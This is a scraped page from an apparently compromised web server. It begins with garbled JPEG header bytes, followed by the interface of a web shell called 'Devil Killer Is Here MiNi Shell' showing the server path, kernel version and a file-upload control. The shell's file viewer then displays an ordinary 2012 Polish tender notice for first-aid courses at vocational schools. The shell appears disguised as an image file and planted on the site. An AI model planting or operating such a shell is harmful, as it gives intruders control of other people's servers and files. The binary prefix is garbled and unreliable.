JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120911/341440-N-2012.html

<p class="kh_header"><b>Kraków: Zakup usług organizacji i przeprowadzenia kursów z zakresu udzielania pierwszej pomocy w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce</b><br>
<b>Numer ogłoszenia: 341440 - 2012; data zamieszczenia: 11.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie , os. Teatralne 4a, 31-945 Kraków, woj. małopolskie, tel. 12 6442872, 501642173, faks 12 6449997.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sppsmis3.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna województwa małopolskiego..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług organizacji i przeprowadzenia kursów z zakresu udzielania pierwszej pomocy w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania jest zorganizowanie                         i przeprowadzenie kursów  z zakresu udzielania pierwszej pomocy                    w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w:
Część I : Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, ul. Królewska 86, 30 - 079 Kraków
Przedmiotem zamówienia jest organizacja i realizacja kursu udzielania pierwszej pomocy dla łącznie 30 osób w podziale na grupy: 18 osób i 12 osób, w tym uczniowie niewidomi i słabowidzący.  
W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany 
jest do zapewnienia materiałów szkoleniowych, które nie będą stanowić 
własności kursantów dla każdego uczestnika kursu (Wykonawca 
dostarcza manekiny osób dorosłych, manekin dziecka i manekin niemowlęcia, urządzenia AED z opcją ćwiczebną, środki opatrunkowe, środki do dezynfekcji, maseczki ochronne, rękawiczki medyczne jednorazowe potrzebne do realizacji szkolenia

Część II:  Szkole Policealnej Pracowników Służb Medycznych             i Społecznych w Nowym Sączu, ul. Jagiellońska 45, 33-300 Nowy Sącz
Przedmiotem zamówienia jest organizacja i realizacja kursu pn. Kurs z pierwszej pomocy medycznej dla 24 uczniów i uczennic          (I grupa - 8 osób, II grupa - 8 osób, III grupa - 8 osób) Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu,  w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce

Część III:  Krakowskiej Medycznej Szkole Policealnej Nr 1 w Krakowie, ul. Zamojskiego 58, 30-523 Kraków
Przedmiotem tej częścipostępowania jest zorganizowanie 8 godzin kursu pierwszej pomocy dla 10 uczniów kształcących się w zawodzie higienistka stomatologiczna w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek dysponowania odpowiednim osobami, zdolnymi do wykonania zamówienia Zamawiający uzna Wykonawców, którzy dysponują lub będą dysponować na zasadach przewidzianych w art. 26 ust. 2b ustawy pzp:
w części I co najmniej trzema osobami posiadającymi wykształcenie pozwalające na prowadzenie szkoleń z pierwszej pomocy, zgodne z aktualnie obowiązującą ustawą o Państwowym Ratownictwie Medycznym. Osoba ta musi posiadać co najmniej 3 letnie doświadczenie zawodowe (ratownik medyczny lub pielęgniarka systemu ratownictwa medycznego lub lekarz systemu ratownictwa medycznego) i należeć do czynnego zawodowo personelu medycznego   pogotowia ratunkowego lub szpitalnego oddziału ratunkowego. Ponadto osoba ta musi posiadać doświadczenie ogólne w zakresie prowadzenia szkoleń z pierwszej pomocy wyrażające się w przeszkoleniu co najmniej 100 osób w ciągu ostatnich 2 lat, w tym doświadczenie praktyczne w zakresie przeprowadzenia co najmniej 2 szkoleń z zakresu pierwszej pomocy dla osób niewidomych i słabowidzących. 
w części II dysponują co najmniej jedną osobą posiadającą wykształcenie medyczne: ratownik medyczny lub  pielęgniarka lub lekarz. Ponadto osoba ta musi posiadać doświadczenie ogólne w zakresie prowadzenia szkoleń z pierwszej pomocy wyrażające się w przeszkoleniu co najmniej 100 osób w ciągu ostatnich 2 lat. 
w części III posiadającej wykształcenie pozwalające na prowadzenie szkoleń z pierwszej pomocy zgodne z aktualnie obowiązującą ustawą               o Państwowym Ratownictwie Medycznym. Osoba ta musi posiadać doświadczenie ogólne w zakresie prowadzenia szkoleń z pierwszej pomocy wyrażające się w przeszkoleniu co najmniej 100 osób w ciągu ostatnich 2 lat.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">szczegółowy program(opis) kursu odpowiednio dla danej części</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1/. Pełnomocnictwo - do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana, jako upoważniona do jego reprezentacji we właściwym rejestrze.
2/. Dowód dysponowania zasobami niezbędnymi do realizacji zamówienia  w przypadku polegania na zdolnościach innych podmiotów, zgodnie z art. 26 ust. 2b ustawy, w szczególności pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia wraz z wykazaniem, że zobowiązanie to zostało podpisane przez osoby uprawnione (np. dokumenty rejestrowe, pełnomocnictwa) - jeżeli dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sppsmis3.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 102a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.09.2012 godzina 12:00, miejsce: Zespół Jednostek Edukacyjnych Województwa Małopolskiego w Krakowie, os. Teatralne 4a, 31-945 Kraków pok. nr 213.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego za pośrednictwem Programu Operacyjnego Kapitał Ludzki, działanie 9.2; Projekt Systemowy Województwa Małopolskiego Modernizacja Kształcenia Zawodowego w Małopolsce.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu pierwszej pomocy w Szkole Policealnej Integracyjnej Masażu Leczniczego Nr 2 w Krakowie, ul. Królewska 86, 30 - 079 Kraków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoła Policealna Integracyjna Masażu Leczniczego Nr 2 
w Krakowie, ul. Królewska 86, 30 - 079 Kraków

Szczegółowe wymagania związane z realizacją przedmiotu zamówienia:

Przedmiotem zamówienia jest organizacja i realizacja kursu udzielania pierwszej pomocy dla łącznie 30 osób w podziale na grupy: 18 osób i 12 osób, w tym uczniowie niewidomi i słabowidzący.  
W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany 
jest do zapewnienia materiałów szkoleniowych, które nie będą stanowić 
własności kursantów dla każdego uczestnika kursu (Wykonawca 
dostarcza manekiny osób dorosłych, manekin dziecka i manekin niemowlęcia, urządzenia AED z opcją ćwiczebną, środki opatrunkowe, środki do dezynfekcji, maseczki ochronne, rękawiczki medyczne jednorazowe potrzebne do realizacji szkolenia). 

Obowiązki Wykonawcy.

Wykonawca w ramach realizacji tej części zamówienia zobowiązany jest zapewnić prowadzenie zajęć przez wykwalifikowaną kadrę, posiadającą 
uprawnienia i doświadczenie w realizacji kursów z tematu objętego 
przedmiotową umową oraz pokryć koszty organizacji kursu (wykładowców zajęć praktycznych i trenerów zajęć ćwiczeniowych), koszt wyposażenia specjalistycznego koniecznego do przeprowadzenia ww. kursu (pkt. 3.2.1.2), koszt materiałów szkoleniowych dla każdego uczestnika kursu. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.
Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 
Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,
b.	program kursu oraz dziennik zajęć,
c.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
d.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem


Zaświadczenia (certyfikaty) o uczestnictwie w danym kursie wystawi Zamawiający.

Ramowy program kursu: program kursu obejmuje 16 godzin zajęć teoretyczno-ćwiczeniowych (8 godzin szkolenia na jedną grupę), przy czym przez 1 godzinę trwania kursu Zamawiający rozumie 60 minut. 

Kurs musi się odbywać w oparciu o opracowany przez prowadzącego PROGRAM KURSU, załączony do oferty, OBEJMUJĄCY MIĘDZY INNYMI NIŻEJ WYMIENIONE ZAGADNIENIA:

Część teoretyczna:
a.	Zasady bezpieczeństwa, aspekty psychologiczne związane z niesieniem pomocy. Aspekty prawne udzielania pierwszej pomocy. Zasady udzielania pierwszej pomocy, specyfika zagrożeń w pracy masażysty,
b.	Zabezpieczenie miejsca zdarzenia - ocena poszkodowanego,
c.	Profilaktyka zakażeń podczas działań ratunkowych,
d.	Organizacja i wzywanie pogotowia ratunkowego,
e.	Ocena funkcji życiowych - podejście do poszkodowanego,
f.	Postępowanie z osobą nieurazową,
g.	Postępowanie z pacjentem nieprzytomnym, 
h.	Ocena i resuscytacja poszkodowanego urazowego,
i.	Algorytm działania BLS (Basic Life Support),
j.	Resuscytacja dorosłych i dzieci - CPR (Cardio-Pulmonary Resuscitation),
k.	Użycie automatycznego defibrylatora - AED (Automated External Defibrillation),
l.	Pozycja boczna ustalona (pozycja bezpieczna),
m.	Współczesne sposoby tamowania i opatrywania, ciało obce w ranie,
n.	Postępowanie w urazach kończyn (złamanie, skręcenie, zwichnięcie, amputacja kończyny),
o.	Postępowanie w urazach głowy i kręgosłupa,
p.	Oparzenia termiczne i chemiczne,
q.	Przegrzanie i udar cieplny,
r.	Udzielnie pierwszej pomocy u osób porażonych prądem lub piorunem,
s.	Postępowanie w stanach: zawał serca, omdlenie, astma, zadławienia, napady padaczkowe, udar mózgu,
t.	Postępowanie we wstrząsie anafilaktycznym,
u.	Wsparcie psychologiczne poszkodowanego,
v.	Ewakuacja poszkodowanych z miejsca zdarzenia, 
w.	Wypadek komunikacyjny, masowy,
x.	Kompletowanie apteczki pierwszej pomocy do gabinetu masażu
  
      
Część praktyczna:
Ćwiczenia udzielania pomocy w symulowanych zdarzeniach. 
Ćwiczenia praktyczne odbywają się w podgrupach 6 osobowych.

Czas trwania kursu:  8 godzin zegarowych z wliczonymi przerwami dla jednej grupy, czyli łącznie dla 2 grup 16 godzin 
Wykonawca zobowiązany jest do zaplanowania przerw w łącznym czasie 1 godziny dla jednej podgrupy.
Zajęcia muszą być prowadzone w dni wolne od nauki. 

Liczba uczestników kursu: łącznie 30 osób w podziale na 2 grupy: pierwsza podgrupa: 18 osób, druga grupa: 12 osób, w tym uczniowie niewidomi i słabowidzący. 
Ćwiczenia praktyczne mają być realizowane w podgrupach 6 osobowych.
Na jedną 6 osobową podgrupę ćwiczeniową przypada jeden instruktor.
Kurs musi być realizowany w grupach równolegle: dla 18 osób - trzy zespoły po 6 uczniów i odpowiednio 3 instruktorów, dla 12 osób - dwa zespoły po 6 uczniów i odpowiednio 2 instruktorów.
Rekrutację na kurs prowadzi Zamawiający. Wykonawca otrzyma listę 
uczestników po podpisaniu umowy. 

Czas realizacji: od 5 listopada do 15 grudnia 2012 roku, w ramach którego do obowiązków Wykonawcy należy przeprowadzenie 16 godzin szkolenia dla 30 uczniów (2 grupy - 18 i 12 osób). 

Szczegółowy harmonogram realizacji przedmiotu zamówienia dla tej części zamówienia zostanie ustalony z Przedstawicielem Zamawiającego - Liderem Szkolnym po podpisaniu umowy. 

Kurs powinien zostać zorganizowany w czasie wolnym od nauki szkolnej. Umowa będzie realizowana w Szkole Policealnej Integracyjnej Masażu 
Leczniczego Nr 2 w Krakowie. Zamawiający udostępnia bezpłatnie sale wykładowe, w godzinach, w których nie są wykorzystywane do prowadzenia zajęć szkolnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.56.20.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie kursu pierwszej pomocy w   Szkole Policealnej Pracowników Służb Medycznych             i Społecznych w Nowym Sączu, ul. Jagiellońska 45, 33-300 Nowy Sącz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkoła Policealna Pracowników Służb Medycznych                                 i Społecznych w Nowym Sączu, ul. Jagiellońska 45, 33-300 Nowy Sącz

Przedmiotem niniejszego postępowania jest zorganizowanie kursu pn.  Kurs z pierwszej pomocy medycznej, dla uczniów i uczennic  Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu, w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce, współfinansowanego w ramach Europejskiego Funduszu Społecznego

Szczegółowe wymagania związane z realizacją przedmiotu zamówienia: 

Przedmiotem zamówienia jest organizacja i realizacja kursu pn. Kurs z pierwszej pomocy medycznej dla 24 uczniów i uczennic          (I grupa - 8 osób, II grupa - 8 osób, III grupa - 8 osób) Szkoły Policealnej Pracowników Służb Medycznych i Społecznych w Nowym Sączu,  w ramach realizacji projektu pn. Modernizacja kształcenia zawodowego w Małopolsce.


Obowiązki Wykonawcy.

Wykonawca zobowiązany jest zapewnić na własny koszt wszystkie elementy związane z realizacją zamówienia, to jest w szczególności:
a.	wykładowców zajęć teoretycznych i zajęć ćwiczeniowych dla uczestników kursu, posiadających uprawnienia i doświadczenie w prowadzeniu kursów z tematu objętego przedmiotową umową,
b.	wyposażenie specjalistyczne w  postaci sprzętu ratowniczego dla uczestników kursu (2 szt. fantom dorosły, 1 szt. fantom dziecka powyżej 1 roku życia, 1 szt. fantom dziecko poniżej 1 roku życia, 1 szt. automatyczny defibrylator zewnętrzny, materiały opatrunkowe tj. różne rozmiary bandaży elastycznych i nieelastycznych, elastyczne siatki opatrunkowe różnych rozmiarów, chusty trójkątne, gaziki jałowe i niejałowe różnych rozmiarów, 2 szt. apteczka pierwszej pomocy, środki do dezynfekcji skóry i ran, 2szt. folia życia),
c.	materiały szkoleniowe dla każdego uczestnika kursu, które przechodzą na własność kursanta, tj.Wytyczne resuscytacji  2010 Europejskiej Rady Resuscytacji w wersji książkowej, maseczki twarzowe PocketMask, kserokopie  prezentacji multimedialnych,
d.	przeprowadzenie egzaminu wewnętrznego, 

Zamawiający po zakończeniu kursu przeprowadzi jego ewaluację za pomocą anonimowych ankiet ewaluacyjnych. 

W ramach promocji przedmiotu umowy Wykonawca zobowiązany jest także do:
a.	oznakowania sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki,
b.	informowania uczestników kursu o fakcie współfinansowania zajęć ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego,
c.	stosowania na wszystkich dokumentach  w trakcie wykonywania przedmiotowego zamówienia znaków zgodnie z wytycznymi POKL
Wzór papieru firmowego zostanie udostępniony przez Zamawiającego niezwłocznie po podpisaniu umowy.

Wykonawca po zakończeniu kursu przedstawi Zamawiającemu następujące dokumenty, zatwierdzone przez przedstawiciela Wykonawcy: 
a.	listę obecności z własnoręcznymi podpisami uczestników kursu w każdym dniu zajęć,
b.	program kursu oraz dziennik zajęć,
c.	protokół z egzaminu wewnętrznego,
d.	potwierdzenia odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
e.	informację o zrealizowaniu usługi wraz z fakturą VAT/rachunkiem. 

Zaświadczenia o uczestnictwie w danym kursie wystawi Zamawiający.

Ramowy program kursu:
Program kursu musi obejmować dla jednej grupy 30 godz. w tym: 10 godzin teoretycznych i 20 godzin praktycznych. 
Za godzinę zajęć przyjmuje się godzinę dydaktyczną trwającą 45 minut.

Kurs musi się odbywać w oparciu o opracowany przez prowadzącego PROGRAM KURSU, załączony do oferty, obejmujący niżej wymienione zagadnienia.

Część teoretyczna:
a.	łańcuch ratunkowy. Aspekty prawne związane z udzielaniem pierwszej pomocy. Zagrożenia związane z udzielaniem pierwszej pomocy. Pozycja boczna ustalona (około 2 godz.), 
b.	BLS  u dorosłych i dzieci (około 2 godz.), 
